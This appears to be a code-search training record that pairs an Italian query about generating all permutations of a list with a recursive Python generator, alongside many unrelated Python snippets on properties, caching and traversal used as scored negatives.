pass\n try:\n if plist.all(self, hasattr, name):\n return plist([getattr(x, name) for x in self], root=self.__root__)\n return plist([x[name] for x in self], root=self.__root__)\n except Exception as e:\n raise AttributeError('plist children raised exceptions attempting to get attribute \\'%s\\' (%s)' % (name, str(e)))", "def propertyListGenerator(name, cls):\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]", "def _cache_property_accessor(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[0]\n return None", "def _query_properties(self, props=None, depth=0):\n root = None\n # build the propfind request\n if props is not None and len(props) > 0:\n prop = dav.Prop() + props\n root = dav.Propfind() + prop\n\n return self._query(root, depth)", "def getPropertiesAll():", "def load(self):\n for prop in self.properties:\n try:\n value = getattr(self, prop)\n self._prop_dict[prop] = value\n except AttributeError as ate:\n pass", "def _determine_properties(self, paramdict):\n for var in paramdict:\n if is_dimensionless(paramdict[var]):\n self._all_params_unit[var] = \"none\"\n yield lems.Property(var, \"none\")\n else:\n dim = _determine_dimension(paramdict[var])\n self._all_params_unit[var] = dim\n yield lems.Property(var, dim)", "def load_recursive_state_dict(x, obj):\n if hasattr(obj, 'load_state_dict'):\n obj.load_state_dict(x)\n if isinstance(x, (tuple, list)):\n for xx, oo in zip(x, obj):\n load_recursive_state_dict(xx, oo)\n if isinstance(x, dict):\n for k in objs.keys():\n load_recursive_state_dict(xx[k], oo[k])", "def test_get_all_ancestor_properties(self):\n pass", "def __(self):\n self.__pepth__ = self.pdepth(True)\n return self", "def property_setup(self, properties):\n return properties", "def _eval_shallow(servicedef, obj, need_copy=False):\n\n # _eval_shallow() resolves $ref and $merge to their values in\n # source and with_. This is a *shallow* evaluation in that embedded\n # $ref or $merge at deeper levels are *not* resolved.\n #\n # For example, the following will be resolved:\n # { $ref: ... }\n # { $merge: ... }\n #\n # But the following will *not* be resolved\n # { type: object,\n # properties: { x: { $ref: ... } } }\n #\n # Need to loop in the event that a $ref resolves to another $ref\n # or a $ref to a $merge:\n #\n # { $ref: <target1> } --> { $ref: <target2> } --> { <value2> }\n #\n\n # Minimize copies so that we don't bloat memory\n done = False\n is_copy = False\n while not done:\n if '$merge' in obj:\n with Parser(obj['$merge'], 'eval_shallow') as merge_parser:\n merge_source = merge_parser.parse('source', save=False,\n required=True)\n merge_with = merge_parser.parse('with', save=False,\n required=True)\n\n # This always returns a copy\n obj = json_merge_patch(servicedef, merge_source, merge_with)\n is_copy = True\n\n elif '$ref' in obj:\n if len(list(obj.keys())) != 1:\n raise ParseError(\n \"$ref object may not have any other properties\", obj)\n\n sch = servicedef.find(obj['$ref'])\n obj = sch.input\n is_copy = False\n\n else:\n done = True\n\n if not is_copy and need_copy:\n obj = copy.copy(obj)\n\n return obj", "def build_property(value_token: ValueToken) -> property:\n def caller(_: Any) -> Any:\n return value_token.get_value()\n return property(caller)", "def properties(self):\n raise NotImplementedError", "def _lock_property(self, **properties):\n self._property_lock = properties\n try:\n yield\n finally:\n self._property_lock = {}", "def go_next(context: Context) -> None:\n\n state = context.decode_state()\n if not state:\n print('Selected frame is not in a property.')\n return\n\n # If execution reached the part of the code where the property is about to\n # return a cached result, just let it return.\n if state.in_memoization_lookup:\n gdb.execute('finish')\n return\n\n scope_state, current_expr = state.lookup_current_expr()\n\n if current_expr is None:\n # There are only two possible causes for no currently evaluating\n # expressions: either the property just started (root expression\n # evaluation is ahead), either it is about to return (root expr. eval.\n # is behind).\n bp_group = break_scope_start(context, state.property_scope.scope,\n from_line_no=state.line_no)\n\n if bp_group:\n # The first expression is ahead: resume execution until we reach\n # it.\n gdb.execute('continue')\n else:\n gdb.execute('finish')\n\n else:\n # Depending on the control flow behavior of the currently running\n # expression, the next step can be either its parent expression or any\n # of its sub-expressions.\n next_slocs_candidates = []\n\n # First look for the point where the current expression terminates its\n # evaluation.\n next_slocs_candidates.append(current_expr.done_event.line_no)\n\n # Now look for the starting point for all sub-expressions\n for subexpr in current_expr.start_event.sub_expr_start:\n next_slocs_candidates.append(subexpr.line_no)\n\n BreakpointGroup(context, next_slocs_candidates)\n gdb.execute('continue')\n\n new_current_expr = None\n new_expr = None\n\n new_state = context.decode_state()\n if new_state:\n _, new_current_expr = new_state.lookup_current_expr()\n if current_expr:\n new_expr = new_state.lookup_expr(current_expr.expr_id)\n\n # If we just finished the evaluation of an expression, display its value\n if new_expr and new_expr.is_done:\n assert new_state is not None\n print('{} evaluated to: {}'.format(\n expr_repr(new_expr),\n new_expr.read(new_state.frame)\n ))\n\n # Display the expression of most interest, if any\n if new_current_expr:\n print('')\n print('Now evaluating {}'.format(expr_repr(new_current_expr)))", "def Property(name):\n\n attr_name = \"__\" + name\n\n def get(self):\n try:\n return self.__dict__[attr_name]\n except KeyError:\n raise AttributeError, name\n\n def set(self, value):\n if attr_name not in self.__dict__ \\\n or self.__dict__[attr_name] != value:\n self.__dict__[attr_name] = value\n self.is_modified = True\n\n return property(get, set)", "def cached_property(expensive_function):\n @property\n def caching_function(self):\n cacheName = f\"__cache__{expensive_function.__name__}\"\n \n\t\t\n try: # check if the cache has been initialized\n cacheExists = True\n cache = getattr(self, cacheName)\n except AttributeError:\n cacheExists = False\n cache = None\n \n\t\t# Check if the cache is valid (not None), caching is requested, and that it exists\n if ( cache is not None ) and ( self.withCaching == True ) and (cacheExists == True):\n return cache\n else:\n\t\t\t#worst case, now we have to compute the quantity\n computed = expensive_function(self)\n setattr(self, cacheName, computed)\n return computed\n \n return caching_function", "def getProperty(propname):", "def cached_property(fun):\n @functools.wraps(fun)\n def get(self):\n try:\n return self._cache[fun]\n except AttributeError:\n self._cache = {}\n except KeyError:\n pass\n ret = self._cache[fun] = fun(self)\n return ret\n return property(get)", "def test_properties_get(self):\n pass", "def auto_property_list(self, prop_reader_cls, offset_addr, n_offsets, n_items_per_sub_list=0, sub_list_prefix=''):\n prop_reader = prop_reader_cls()\n use_sub_lists = n_items_per_sub_list > 0\n prop_list = {}\n\n # If we don't have sub lists in the property list, just use the main prop_list as the current sub list\n if use_sub_lists:\n sub_list = None\n n_sub_lists = (n_offsets - 1) // n_items_per_sub_list\n else:\n sub_list = prop_list\n n_sub_lists = 1\n\n # Initialize read\n data_addr = offset_addr + n_offsets * 4\n offset = self.uint32()\n\n for prop_id in range(n_offsets - 1):\n # Maybe update sub list\n if use_sub_lists:\n sub_list_id = prop_id // n_sub_lists\n prop_id = prop_id % n_sub_lists\n\n if prop_id == 0:\n prop_list[f'{sub_list_prefix}{sub_list_id}'] = sub_list = {}\n\n # Read the property\n next_offset = self.uint32()\n with self.offset_context(data_addr + offset):\n data = prop_reader.read(prop_id, self, next_offset - offset)\n sub_list.update(data)\n\n offset = next_offset\n\n # Set the pointer after the data\n self.seek(data_addr + offset)\n\n return prop_list", "def iterProperties(cls):\n meta = cls.staticMetaObject\n for i in range(meta.propertyCount()):\n yield meta.property(i).name()", "def getParentProperty(self, propertyName):\n return [getattr(fp, propertyName) for dp in self.deblendedParents]", "def useProperties(cls):\n def getter(name):\n def get(self):\n return self.property(name)\n return get\n def setter(name):\n def set(self, value):\n return self.setProperty(name, value)\n return set\n for name in iterProperties(cls):\n setattr(cls, name, property(getter(name), setter(name)))\n return cls", "def property_autoparse(self, candidate_pattern, patterns):\n properties = None\n candidates = self.find_objects(regex=candidate_pattern)\n if len(candidates):\n properties = []\n else:\n return properties\n for candidate in candidates:\n properties.append(self.match_to_dict(line=candidate, patterns=patterns))\n return properties", "def __iter__(self):\n\n result = []\n\n # d - dict, p - path (keys sequence)\n def recurs_iter(d, p=None):\n p = p or []\n\n # k - key, v - value\n for k, v in iteritems(d):\n next_p = p + [k]\n if isinstance(v, dict):\n recurs_iter(v, next_p)\n else:\n result.append(tuple(next_p))\n\n recurs_iter(self.__dict__)\n\n return iter(result)", "def _cache_property_methods(self, name):\n if name.endswith(\"_\"):\n # If the requested name ends with _, that's a marker that we're\n # dealing with a method call, not a property, so we can shortcut\n # the process.\n methods = None\n else:\n # Check 1: Does the class respond to the property?\n responds = libobjc.class_getProperty(self, name.encode(\"utf-8\"))\n\n # Check 2: Does the class have an instance method to retrieve the given name\n accessor = self._cache_method(name)\n\n # Check 3: Is there a setName: method to set the property with the given name\n mutator = self._cache_method(\"set\" + name[0].title() + name[1:] + \":\")\n\n # Check 4: Is this a forced property on this class or a superclass?\n forced = False\n superclass = self\n while superclass is not None:\n if name in superclass.forced_properties:\n forced = True\n break\n superclass = superclass.superclass\n\n # If the class responds as a property, or it has both an accessor *and*\n # and mutator, then treat it as a property in Python.\n if responds or (accessor and mutator) or forced:\n methods = (accessor, mutator)\n else:\n methods = None\n return methods", "def __getitem__(self, key):\n key_split = key.split('.')\n last_index = len(key_split) - 1\n current = self\n for i, k in enumerate(key_split):\n try:\n current = getattr(current, k)\n except KeyError:\n if i == last_index:\n raise\n temp_dict = DotDictWithAcquisition()\n temp_dict.__dict__['_parent'] = weakref.proxy(current)\n current = temp_dict\n return current", "def get_properties():", "def test_dotted_named_entities_circular_references():\n from tests.dottedname.foo.bar.bop import Property\n\n p = Property(\n name='outer',\n nested={\n 'properties': [\n Property(name='inner')\n ]\n }\n )\n assert p\n assert isinstance(p.nested.properties, list)\n assert p.nested.properties[0].name == 'inner'", "def properties_owns(cls, *args):\n return cls.graph_traversal(\n None, None, Bytecode()).properties_owns(*args)", "def is_lazy(self) -> bool:\n return self._is_lazy", "def __iter__(self):\n element = self\n\n while element.HasField(\"pathtype\"):\n yield element\n\n if element.HasField(\"nested_path\"):\n element = element.nested_path\n else:\n break", "def get(obj, path):\n right = path\n cur = obj\n while right:\n left, right = partition(right)\n if isinstance(cur, dict):\n cur = cur.get(left)\n elif isinstance(cur, (list, tuple)):\n left = int(left)\n cur = cur[left] if left < len(cur) else None\n return cur", "def __iter__(self):\n n = self.getRoot()\n while n.left is not None:\n n = n.left\n while True:\n yield n.value\n n = n._successor()\n if n is None:\n break", "def __call__(self, arg):\n return self.get_property(arg)", "def max_recursion_depth(self) -> ConfigNodePropertyInteger:\n return self._max_recursion_depth", "def memoized_property(method):\n\n method_name = method.__name__\n attr_name = \"_\" + method_name\n undefined = object()\n\n def wrapped(self):\n attr = getattr(self, attr_name, undefined)\n if attr is undefined:\n attr = method(self)\n setattr(self, attr_name, attr)\n return attr\n\n wrapped = property(wrapped)\n return wrapped", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def __iter__(self):\n\n if not self.left and not self.right:\n raise StopIteration\n return self.children().__iter__()\n\n # def SP_traverse(self):\n \"\"\" Return a string of series-parallel partial order.\n\n A recursion way to implement in-order traversal.\n\n return\n -------\n A simple formula of series-parallel partial order\n\n \"\"\"\n # if self.left != None and self.right == None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data)\n #\n # if self.right != None and self.left == None:\n # return str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left != None and self.right != None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left == None and self.right == None:\n # return str(self.data)", "def _evaluate(prop_name, prop_value, binary_info):\n\n def compatible_prop(setting_value, _prop_value):\n return (_prop_value == setting_value) or (_prop_value == \"None\" and setting_value is None)\n\n # TODO: Necessary to generalize this query evaluation to include all possible fields\n info_settings = binary_info.get(\"settings\", {})\n info_options = binary_info.get(\"options\", {})\n\n if not prop_name.startswith(\"options.\"):\n return compatible_prop(info_settings.get(prop_name), prop_value)\n else:\n prop_name = prop_name[len(\"options.\"):]\n return compatible_prop(info_options.get(prop_name), prop_value)", "def get_next(self):\n\n pos_options = []\n kw_options = {}\n for opt in self.pos_options:\n if isinstance(opt, LazyObject):\n pos_options.append(opt.get_current())\n elif isinstance(opt, LazyExpression):\n pos_options.append(opt.eval())\n else:\n pos_options.append(opt)\n\n for opt_k, opt_v in self.kw_options.items():\n if isinstance(opt_v, LazyObject):\n kw_options[opt_k] = opt.get_current()\n elif isinstance(opt_v, LazyExpression):\n kw_options[opt_k] = opt_v.eval()\n else:\n kw_options[opt_k] = opt_v\n\n self.current_obj = self.cls(*pos_options, **kw_options)\n return self.current_obj", "def callPropertyGet(self, name = \"__value\", index = None):\n\t\tif name == 'IID':\n\t\t\treturn CSLValue(typeid = \"string\", value = self.callerInfo.IID)\n\t\tEntry = self.vtbl['p_' + name + \"_get\"]\n\t\t#localTbl = { 'vars':{}, 'status':0, 'props':{}, 'alias':{}, 'persistent':{}, 'instance':{}}\n\t\tpropEntry = Entry.parent\n\t\tprmName = propEntry.data['prm']\n\t\tlocalTbl = self.CSLCreateLocalTbl({}, {}, {}, copy.copy(propEntry.data['persistent']), copy.copy(propEntry.data['instance']))\n\t\tif prmName != \"\":\n\t\t\tif index == None:\n\t\t\t\tdefault = propEntry.data['default']\n\t\t\t\tif default != \"\":\n\t\t\t\t\tdefault = self.CSLCheckValue(default, localTbl)\n\t\t\t\telse:\n\t\t\t\t\tdefault = CSLValue(typeid = \"NULL\", value = None)\n\t\t\telse:\n\t\t\t\tdefault = index\n\n\t\t\tlocalTbl['vars'][prmName] = default\n\n\t\tself.procStack.append('p_' + name + '_get')\n\t\tself.lastLTbl = self.CSLInterpreter(Entry.child, localTbl)\n\t\tself.procStack.pop()\n\t\tl = self.lastLTbl['vars']\n\n\t\tself.debug(DEBUG_CALL, \"\\n\\nGetProp result: (\", name, \")\", l, \"haskey:\", l.has_key(name))\n\n\t\tif l != None and l.has_key(name):\n\t\t\tself.debug(DEBUG_CALL, \"Get Property return:\", l[name])\n\t\t\treturn copy.deepcopy(l[name])\n\t\telse:\n\t\t\treturn CSLValue(typeid = \"NULL\", value = None)", "def test_cached_property():\n new_value = \"99999\"\n\n class DummyClass:\n def __init__(self):\n self.value = \"11111\"\n\n def change_value_in_instance(self, value):\n self.value = value\n\n @cached_property\n def test_property(self):\n return self.value\n\n @property\n def test_uncached_property(self):\n return self.value\n\n testClass = DummyClass()\n first_cached_test_property = testClass.test_property\n first_uncached_test_property = testClass.test_uncached_property\n testClass.change_value_in_instance(new_value)\n second_cached_test_property = testClass.test_property\n second_uncached_test_property = testClass.test_uncached_property\n\n assert first_cached_test_property == second_cached_test_property\n assert first_cached_test_property == \"11111\"\n\n assert first_uncached_test_property != second_uncached_test_property\n assert first_uncached_test_property == \"11111\"\n assert second_uncached_test_property == \"99999\"", "def process_property(self, resources, resource, model, prop, context):\n pass", "def lazy(func):\n\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n name = \"_\" + func.__name__\n try:\n return getattr(self, name)\n except AttributeError:\n value = func(self, *args, **kwargs)\n setattr(self, name, value)\n return value\n\n return wrapper", "def Property(\tsubspaceFunction = lambda instance: instance.sharedStateSubspace,\n default = lambda: None,\n exposeToProtocol = False\n ):\n def propertyListGenerator(name, cls):\n \"\"\"Generates a list of (name, ComputedGraph.Property) objects corresponding to\n this property object.\"\"\"\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]\n\n return ComputedGraph.PropertyMaker(propertyListGenerator, exposeToProtocol)", "def __get__(self,obj,objtype):\n gen = super(Dynamic,self).__get__(obj,objtype)\n\n if not hasattr(gen,'_Dynamic_last'):\n return gen\n else:\n return self._produce_value(gen)", "def make_recursive_propdict(wcroot,\r\n output,\r\n rex = re.compile(\"Properties on '(.*)':\")):\r\n lines = filter(None, output.split('\\n'))\r\n pdict = {}\r\n while lines:\r\n line = lines.pop(0)\r\n m = rex.match(line)\r\n if not m:\r\n raise ValueError, \"could not parse propget-line: %r\" % line\r\n path = m.groups()[0]\r\n wcpath = wcroot.join(path, abs=1)\r\n propnames = []\r\n while lines and lines[0].startswith(' '):\r\n propname = lines.pop(0).strip()\r\n propnames.append(propname)\r\n assert propnames, \"must have found properties!\"\r\n pdict[wcpath] = svncommon.PropListDict(wcpath, propnames)\r\n return pdict", "def _compute_invalidation_scope_recursive(request, result, meta, source_type, target_type, simulated_prop):\n if 'calculatedProperty' in meta: # we cannot patch calc props, so behavior here is irrelevant\n return\n elif meta['type'] == 'object':\n if 'properties' not in meta:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n elif meta['type'] == 'array':\n sub_type = meta['items']['type']\n if sub_type == 'object':\n if 'properties' not in meta['items']:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['items']['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)", "def properties(self):", "def properties(self):", "def properties(self):", "def test_lazy_base_class(self):\n\n class Base(object):\n def base_method(self):\n pass\n\n class Klazz(Base):\n pass\n\n t = lazy(lambda: Klazz(), Klazz)()\n self.assertTrue('base_method' in dir(t))", "def deepget(self, key):\n if DEBUG: print(repr(self))\n if '.' in key:\n top, rest = key.split('.', 1)\n #if DEBUG: print(top, rest)\n return self[top].deepget(rest)\n else:\n return self[key]", "def get_properties(self):\n return self.properties", "def get_cached_property_names(self): # real signature unknown; restored from __doc__\n return []", "def property( self, prop ):\n raise NotImplementedError(\"property\")", "def prop(self, statement):\n return MinCut.prop(self._root, statement)", "def abstractproperty(func):\n if sys.version_info > (3, 3):\n return property(abc.abstractmethod(func))\n return abc.abstractproperty(func)", "def __properties__(self) -> dict:\r\n parameters = [\r\n d for d in dir(self) if (d[0] != \"_\") and (d.count(\"set\") == 0)\r\n and (d.count(\"_c\") == 0) and (d.count(\"_f\") == 0)\r\n ]\r\n\r\n return self.__as_json__(parameters)", "def __iter__(self):\n if self.left is not None:\n yield from self.left\n yield self\n if self.right is not None:\n yield from self.right", "def get_property(self, property, data):\n\n values = data.xpath(\"%s//*[@%s='%s']\" % (self.scope, self.attribute, property))\n if len(values) == 0:\n values = data.xpath(\"//*[@%s='%s']\" % (self.attribute, property))\n return values", "def test_properties_evolution_get(self):\n pass", "def test_augassign_recursion():\n # infinitely recurses in python\n code = \"\"\"\n def rec():\n a = 0\n a += rec()\n return a\n rec()\n \"\"\"\n cls_node = extract_node(code)\n assert next(cls_node.infer()) is util.Uninferable", "def lazy_value(self):\n\n if self.state == Node.State.VALID:\n return self.value\n else:\n return None", "def propertyx(function):\n keys = ('fget', 'fset', 'fdel')\n func_locals = {'doc': function.__doc__}\n\n def probe_func(frame, event, arg):\n if event == 'return':\n locals = frame.f_locals\n func_locals.update(dict((k, locals.get(k)) for k in keys))\n sys.settrace(None)\n return probe_func\n\n sys.settrace(probe_func)\n function()\n return property(**func_locals)", "async def _materialize_walk_obj(d) -> Tree:\n if isinstance(d, ViewModel):\n # Resolve the first level of awaitables\n edge_set = set(d.__visited_edges__)\n edges = await resolve_parallel_dict(d, edge_set)\n # Resolve all edges recursively\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in edges))\n for (k, _), val in zip(edges, vals):\n if k in edge_set:\n setattr(d, k, val)\n return d\n elif isinstance(d, dict):\n # Resolve the first level of awaitables\n items = await resolve_parallel_dict(d)\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in items))\n for (k, _), val in zip(items, vals):\n d[k] = val\n return d\n elif isinstance(d, primitive) or d is None:\n return d\n elif isinstance(d, PaginatedEdge):\n d.edges = await resolve_parallel_iterable(d.edges)\n return d\n elif isinstance(d, Iterable):\n resolved = await resolve_parallel_iterable(d)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif type(d) == types.AsyncGeneratorType:\n d_list = [i async for i in d] # TODO: Optimize\n resolved = await resolve_parallel_iterable(d_list)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif isawaitable(d) or callable(d):\n # TODO: Profile and optimize recursive call\n resolved = await async_resolve_field(d)\n return await _materialize_walk_obj(resolved)\n raise Exception(\"Invalid type: \" + str(type(d)))", "def run(self):\n # Look through the properties.\n for name, value in \\\n self.context.get_properties(self.path).items():\n\n # If the name doesn't match, skip this one.\n if self.nameregex \\\n and not self.nameregex.match(name): continue\n\n # If the value doesn't match, skip this one.\n if self.valueregex \\\n and not self.valueregex.search(value): continue\n\n # Execute the child actions.\n self.context.tokens['PropName'] = name\n self.context.tokens['PropValue'] = value\n exitcode = super(FilterPropList, self).run()\n\n # If only looking for the first, or an error is reported,\n # bail out early.\n if self.matchfirst or exitcode != 0: return exitcode\n\n # Handle a non-error exit.\n return 0", "def get_properties(\n self, props=None, depth=0, parse_response_xml=True, parse_props=True\n ):\n rc = None\n response = self._query_properties(props, depth)\n if not parse_response_xml:\n return response\n\n if not parse_props:\n properties = response.find_objects_and_props()\n else:\n properties = response.expand_simple_props(props)\n\n error.assert_(properties)\n\n path = unquote(self.url.path)\n if path.endswith(\"/\"):\n exchange_path = path[:-1]\n else:\n exchange_path = path + \"/\"\n\n if path in properties:\n rc = properties[path]\n elif exchange_path in properties:\n if not isinstance(self, Principal):\n ## Some caldav servers reports the URL for the current\n ## principal to end with / when doing a propfind for\n ## current-user-principal - I believe that's a bug,\n ## the principal is not a collection and should not\n ## end with /. (example in rfc5397 does not end with /).\n ## ... but it gets worse ... when doing a propfind on the\n ## principal, the href returned may be without the slash.\n ## Such inconsistency is clearly a bug.\n log.error(\n \"potential path handling problem with ending slashes. Path given: %s, path found: %s. %s\"\n % (path, exchange_path, error.ERR_FRAGMENT)\n )\n error._assert(False)\n rc = properties[exchange_path]\n elif self.url in properties:\n rc = properties[self.url]\n elif \"/principal/\" in properties and path.endswith(\"/principal/\"):\n ## Workaround for a known iCloud bug.\n ## The properties key is expected to be the same as the path.\n ## path is on the format /123456/principal/ but properties key is /principal/\n ## tests apparently passed post bc589093a34f0ed0ef489ad5e9cba048750c9837 and 3ee4e42e2fa8f78b71e5ffd1ef322e4007df7a60, even without this workaround\n ## TODO: should probably be investigated more.\n ## (observed also by others, ref https://github.com/python-caldav/caldav/issues/168)\n rc = properties[\"/principal/\"]\n elif \"//\" in path and path.replace(\"//\", \"/\") in properties:\n ## ref https://github.com/python-caldav/caldav/issues/302\n ## though, it would be nice to find the root cause,\n ## self.url should not contain double slashes in the first place\n rc = properties[path.replace(\"//\", \"/\")]\n elif len(properties) == 1:\n ## Ref https://github.com/python-caldav/caldav/issues/191 ...\n ## let's be pragmatic and just accept whatever the server is\n ## throwing at us. But we'll log an error anyway.\n log.error(\n \"Possibly the server has a path handling problem, possibly the URL configured is wrong.\\n\"\n \"Path expected: %s, path found: %s %s.\\n\"\n \"Continuing, probably everything will be fine\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n rc = list(properties.values())[0]\n else:\n log.error(\n \"Possibly the server has a path handling problem. Path expected: %s, paths found: %s %s\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n error.assert_(False)\n\n if parse_props:\n self.props.update(rc)\n return rc", "def isprop(v):\n return isinstance(v, property)", "def traverse(self, recursive=False):\n out = []\n for i in range(len(self.keys)):\n if recursive == True and self.refs[i] != None:\n out.extend(self.refs[i].traverse(recursive=True))\n out.append[self.values[i]]\n if recursive == True:\n out.extend(self.refs[i+1].traverse(recursive=True))\n return out", "def walk(obj,dict_fn):\n if isinstance(obj,dict):\n result = dict()\n for key, value in obj.items():\n result[key] = walk(value, dict_fn)\n return dict_fn(result)\n if isinstance(obj,list):\n return [walk(i,dict_fn) for i in obj]\n return obj", "def memoized(fget):\n attr_name = \"_{0}\".format(fget.__name__)\n\n @wraps(fget)\n def fget_memoized(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fget(self))\n return getattr(self, attr_name)\n\n return property(fget_memoized)", "def enable_lazy():\r\n global USE_LAZY\r\n USE_LAZY = True", "def computed_some_property(config):\n return config.something + 10", "def run_properties(self, expanded, unexpanded) :\n\t\treturn self.manage_view_properties(expanded, unexpanded, \"/manage_propertiesForm\", perms = \"Manage properties\")", "def get_prop(self):\n\n if self.depth == 2:\n\n return \"\"\n\n return ri.RhinoInput(self.last).get_prop()", "def descendant_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n descendants = nx.descendants(self.se.property_only_graph,\n self.uri)\n result = restructure_output(self,\n descendants,\n inspect.stack()[0][3],\n self.output_type)\n return result" ]
[ "0.6558812", "0.62286186", "0.6222235", "0.6111081", "0.6004813", "0.5979281", "0.5608828", "0.5590664", "0.5550107", "0.5419193", "0.53930444", "0.5368933", "0.5345204", "0.53392524", "0.5152866", "0.5152002", "0.514644", "0.5144571", "0.51304764", "0.5085058", "0.50584644", "0.50355273", "0.5026561", "0.5001398", "0.49765545", "0.49714968", "0.4971482", "0.49477386", "0.49209678", "0.490763", "0.49023068", "0.48982802", "0.48976934", "0.48913345", "0.4885671", "0.48856318", "0.4885494", "0.48834714", "0.4882764", "0.4881576", "0.4874346", "0.48715752", "0.48701447", "0.48674327", "0.4861834", "0.48573688", "0.4844952", "0.4840363", "0.48317963", "0.48042354", "0.47923332", "0.47892702", "0.47866815", "0.478347", "0.477919", "0.47621185", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47584453", "0.47549996", "0.4753754", "0.47429344", "0.47275168", "0.47251192", "0.4718781", "0.47182494", "0.47096625", "0.47081465", "0.4701575", "0.47010106", "0.47010106", "0.47010106", "0.47003993", "0.46998993", "0.46942866", "0.46929848", "0.46803796", "0.46797404", "0.46768996", "0.46720797", "0.46626878", "0.46619138", "0.46583843", "0.4655812", "0.4651831", "0.4647985", "0.46298546", "0.46284577", "0.46218485", "0.4619083", "0.46148524", "0.46133822", "0.4612502", "0.46103463", "0.4608182", "0.46080768", "0.4606708", "0.45809472" ]
0.0
-1
Tutte le possibili permutazioni di una lista
def all_perms(elements): if len(elements) <=1: yield elements else: for perm in all_perms(elements[1:]): for i in range(len(elements)): # nb elements[0:1] works in both string and list contexts yield perm[:i] + elements[0:1] + perm[i:]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
